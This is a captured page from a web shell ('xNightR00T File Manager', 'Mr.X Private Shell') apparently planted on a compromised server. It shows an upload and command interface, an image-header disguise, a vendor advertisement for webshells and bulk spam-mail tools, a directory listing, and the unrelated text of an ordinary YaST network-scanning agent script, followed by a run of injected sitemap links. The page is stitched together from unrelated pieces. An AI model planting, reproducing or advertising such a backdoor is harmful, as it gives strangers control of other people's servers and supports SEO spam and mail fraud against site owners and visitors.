xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/bash

# File:		ag_hostnames
# Package:	Network configuration
# Summary:	Agent for reading hostnames from local network
# Authors:	Michal Svec, Martin Vidner
#
# $Id$
#
# Agent for reading
# - hostnames from local network
# - hostnames of hosts that have a particular TCP port open
# - hostnames of hosts that have a particular RPC service open
# - hostnames of samba servers
#
# Note: hostnames are not sorted.

if [ x$1 = x-d ]; then
    set -x
else
    exec 2>/dev/null
fi

# We want to parse English output
export LC_ALL=C

# this function is duplicated in ag_showexports and ag_hostnames
# after $1 seconds, kill $2 and all its children
# return $2's exit status
function kill_after() {
    local TIMEOUT=$1
    local LONG_PID=$2

    {
	sleep $TIMEOUT
	LONG_CHILDREN_PIDS=`ps --ppid $LONG_PID --no-headers -o pid`
	kill $LONG_PID $LONG_CHILDREN_PIDS
    } &
    SLEEP_PID=$!

    # now wait until the long command finishes or is killed
    wait $LONG_PID
    local RET=$?
    # if it did not exit because of a signal,
    # then the killer is useless and we will kill him instead
    if [ $RET -lt 128 ]; then
	kill $SLEEP_PID
    fi
    return $RET
}

# RETVAL convention avoids passing return values as stdout
# and thus spawning new processes

# uses RETVAL
function ycp_item() {
    RETVAL="\"$1\", "
}

function lookup_ip() {
    local ip=$1
    if [ $BADLOOKUP != 4 ] ; then
#	NAME=$(dig +short +tries=1 +time=1 -x $ip | sed -e 's/\.$//')
#	NAME=$(dig +short -x $ip | sed -e 's/\.$//')
#	NAME=$(host -W1 $ip | sed -n '/.*domain name pointer \(.*\)\.$/s//\1/p')
	NAME="$(getent hosts "$ip" | sed -e 's/^[0-9. ]*//')"
	[ -z "$NAME" ] && BADLOOKUP=$(expr $BADLOOKUP + 1)
	NAME="${NAME:-$ip}"
    else
	NAME="$ip"
    fi
    RETVAL="$NAME"
}

# uses RETVAL
function broadcast_addr() {
    # may be empty
    local INTERFACE=$1
    RETVAL=$(/sbin/ifconfig $INTERFACE | sed -n '/.*Bcast:\([0-9.]*\).*/s//\1/p' | head -n 1)
}

# uses RETVAL
function broadcast_ping() {
    # wait long enough to gather as many hosts as possible, #40582
    RETVAL=$(ping -b -w 10 "$BROADCAST" | sed -n '/.*from \([0-9.]\+\).*/s//\1/p'  | sort -u)
}

# uses exit status
# is_port_open_long $ADDR $PORT
function is_port_open_long() {
    # open (and close) a connection
    exec 3<>/dev/tcp/$1/$2 && exec 3<&-
}

# uses exit status
# is_port_open $ADDR $PORT
function is_port_open() {
    is_port_open_long $1 $2 &
    kill_after 2 $!
}

# uses exit status
# is_rpc_service_open_long $ADDR $SERVICE
function is_rpc_service_open_long() {
    #hack: not quoting $2 enables scanning for a particular version
    /usr/sbin/rpcinfo -u "$1" $2 >/dev/null || \
    /usr/sbin/rpcinfo -t "$1" $2 >/dev/null
}

# uses exit status
# is_rpc_service_open $ADDR $SERVICE
# calls is_rpc_service_open but kills it if it takes too long
function is_rpc_service_open() {
    is_rpc_service_open_long "$1" "$2" &
    kill_after 2 $!
#    local RET=$?
#    echo "result: $RET" >&2
#    return $RET
}

# hostnames [-p portnum|-r rpcservice] [interface]
# echoes the output
function hostnames() {
    local PORT
    local SERVICE
    local INTERFACE
    if [ x$1 = x-p ]; then
	PORT=$2
	shift 2
    elif [ x$1 = x-r ]; then
	SERVICE="$2"
	shift 2
    fi
    INTERFACE=$1

    BADLOOKUP=0
    if [ $IP_ONLY != 0 ]; then
	BADLOOKUP=4
    fi
    broadcast_addr $INTERFACE; BROADCAST=$RETVAL
    if [ "$BROADCAST" ] ; then
	broadcast_ping; IPS=$RETVAL
	ANSWER=
	for IP in $IPS ; do
	    # filter out hosts that do not have the wanted service
	    if [ -n "$PORT" ]; then
		is_port_open $IP $PORT || IP=""
	    elif [ -n "$SERVICE" ]; then
		is_rpc_service_open $IP "$SERVICE" || IP=""
	    fi

	    if [ -n "$IP" ] ; then
		lookup_ip $IP; ycp_item $RETVAL; ANSWER="$ANSWER $RETVAL"
	    fi
	done
	echo '[' "$ANSWER" ']'
    else
	echo '[]'
    fi
}

while true ; do
    IFS=
    read COMMAND || exit
    unset IFS
    # strip leading backquote introduced by NI
    COMMAND=${COMMAND#\`}

    IP_ONLY=0
    case "$COMMAND" in
	"result ("*)
	    exit
	    ;;
	'Dir (.)')
	    echo '[ "rpc", "interface", "samba" ]'
	    ;;
	'Read (.)')
	    hostnames
	    ;;
	'Read (.,'*)
		PORT=$(echo "$COMMAND" | sed 's/^Read (., *\(.*\))/\1/')
		hostnames -p $PORT
	    ;;
	'Read (.rpc,'*)
	    SERVICE=$(echo "$COMMAND" | sed 's/^Read (.rpc, *"\(.*\)")/\1/')
	    hostnames -r "$SERVICE"
	    ;;
	'Read (.ip.rpc,'*)
	    SERVICE=$(echo "$COMMAND" | sed 's/^Read (.ip.rpc, *"\(.*\)")/\1/')
	    IP_ONLY=1
	    hostnames -r "$SERVICE"
	    ;;
	'Read (.interface,'*)
	    INTERFACE=$(echo "$COMMAND" | sed 's/^Read (.interface, *"\(.*\)")/\1/')
	    hostnames $INTERFACE
	    ;;
	'Read (.samba)')
	    echo -n [
		nmblookup -M -T - | awk -F '[, \t]+' '/<01>/ { printf "\"%s\", ", $1; }'
	    echo ]
	    ;;
	*)
	    echo nil
    esac
done

# EOF

Filemanager

Name Type Size Permission Actions
MasterCFParser.pm File 10.55 KB 0755
ag_anyxml File 3.21 KB 0755
ag_background File 8.56 KB 0755
ag_content File 738 B 0755
ag_convert_named_conf File 1.65 KB 0755
ag_cron File 2.5 KB 0755
ag_dhcpd_conf File 6.28 KB 0755
ag_dns_zone File 8.84 KB 0755
ag_etc_sudoers File 5.37 KB 0755
ag_exports File 4.7 KB 0755
ag_fetchmailrc File 8.09 KB 0755
ag_freespace File 1.48 KB 0755
ag_hostnames File 4.68 KB 0755
ag_http_server File 13.31 KB 0755
ag_initscripts File 9.19 KB 0755
ag_kadmin File 21.21 KB 0755
ag_kerberos File 12.27 KB 0755
ag_ksimport File 7.22 KB 0755
ag_mail_ldaptable File 1.79 KB 0755
ag_mailconfig File 6.42 KB 0755
ag_mailtable File 5.88 KB 0755
ag_modinfo File 2.09 KB 0755
ag_named_forwarders File 1.68 KB 0755
ag_netd File 17.24 KB 0755
ag_nis File 6.3 KB 0755
ag_pam_mount File 5.83 KB 0755
ag_passwd File 21.11 KB 0755
ag_ping File 1.58 KB 0755
ag_showexports File 2.49 KB 0755
ag_smtp_auth File 5.6 KB 0755
ag_tty File 3.75 KB 0755
ag_udev_persistent File 3.61 KB 0755
ag_uid File 1.39 KB 0755
ag_yp_conf File 7.56 KB 0755
ag_yp_makefile File 4.38 KB 0755
ag_zypp_repos File 1.55 KB 0755
setup_dkim_verifying.pl File 5.15 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml